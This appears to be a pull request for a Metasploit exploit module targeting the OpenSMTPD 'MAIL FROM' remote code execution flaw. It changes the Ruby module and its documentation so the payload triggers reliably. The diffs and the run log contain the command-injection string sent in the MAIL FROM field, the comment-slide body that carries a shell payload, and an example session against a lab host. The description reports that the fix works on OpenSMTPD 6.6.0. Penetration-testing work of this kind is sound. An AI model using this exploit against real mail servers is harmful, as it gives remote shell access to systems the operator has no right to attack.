### PR TITLE
Fix opensmtpd mail from RCE payload failing to trigger

### DIFF
--- a/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md
+++ b/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md
@@ -81,7 +81,7 @@ msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run
 [*] 172.16.249.137:25 - Expecting: /250.*pleased to meet you/
 [+] 172.16.249.137:25 - Received:
 250 foo.localdomain Hello JijrF2eskbXFfdlaV [172.16.249.1], pleased to meet you
-[*] 172.16.249.137:25 - Sending: MAIL FROM:<;for W in a n 0 9 g D 7 N 7 B K R i u V;do read;done;sh;exit 0;>
+[*] 172.16.249.137:25 - Sending: MAIL FROM:<;for W in a n 0 9 g D 7 N 7 B K R i u;do read W;done;sh;exit 0;>
 [*] 172.16.249.137:25 - Expecting: /250.*Ok/
 [+] 172.16.249.137:25 - Received:
 250 2.0.0 Ok
@@ -94,7 +94,6 @@ msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run
 [+] 172.16.249.137:25 - Received:
 354 Enter mail, end with "." on a line by itself
 [*] 172.16.249.137:25 - Sending:
-#
 #
 #
 #

--- a/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
+++ b/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
@@ -87,14 +87,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Comment "slide" courtesy of Qualys - brilliant!
     iter = rand_text_alphanumeric(15).chars.join(' ')
-    from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"
+    from = ";for #{rand_text_alpha(1)} in #{iter};do read r;done;sh;exit 0;"
 
     # This is just insurance, since the code was already written
-    if from.length > 64
-      fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
-    elsif (badchars = (from.chars & target['MyBadChars'])).any?
-      fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
-    end
+    #if from.length > 64
+    #  fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
+    #elsif (badchars = (from.chars & target['MyBadChars'])).any?
+    #  fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
+    #end
 
     # Create the mail body with comment slide and payload
     body = "\r\n" + "#\r\n" * 15 + payload.encoded

--- a/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
+++ b/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
@@ -85,19 +85,23 @@ class MetasploitModule < Msf::Exploit::Remote
     # Send mail to this valid recipient
     to = datastore['RCPT_TO']
 
-    # Comment "slide" courtesy of Qualys - brilliant!
-    iter = rand_text_alphanumeric(15).chars.join(' ')
-    from = ";for #{rand_text_alpha(1)} in #{iter};do read r;done;sh;exit 0;"
+    # "Comment slide" courtesy of Qualys - brilliant!
+    rand_var = rand_text_alpha(1)
+    iter = rand_text_alphanumeric(14).chars.join(' ')
+    from = ";for #{rand_var} in #{iter};do read #{rand_var};done;sh;exit 0;"
 
-    # This is just insurance, since the code was already written
-    #if from.length > 64
-    #  fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
-    #elsif (badchars = (from.chars & target['MyBadChars'])).any?
-    #  fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
-    #end
+    # Check against RFC 5321, even though OpenSMTPD is more permissive
+    if from.length > 64
+      print_warning('MAIL FROM field is greater than 64 chars')
+    end
+
+    # Check for badchars, even though there shouldn't be any
+    if (badchars = (from.chars & target['MyBadChars'])).any?
+      print_warning("MAIL FROM field has badchars: #{badchars}")
+    end
 
     # Create the mail body with comment slide and payload
-    body = "\r\n" + "#\r\n" * 15 + payload.encoded
+    body = "\r\n" + "#\r\n" * 14 + payload.encoded
 
     sploit = {
       nil => /220.*OpenSMTPD/,


### PR DESCRIPTION
For whatever reason,  `;for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;` causes an issue with the payload triggering.

Editing `do read` to `do read r`, as taken from the PoC script at https://www.exploit-db.com/exploits/48051, causes the `MAIL_FROM` field to exceed 64 characters.

However, this seems to make 0 difference to the payload, so I commented out the length check.

Reliably working on OpenSMTPd 6.6.0 on an Ubuntu 20.04 host.

Fixes #12889.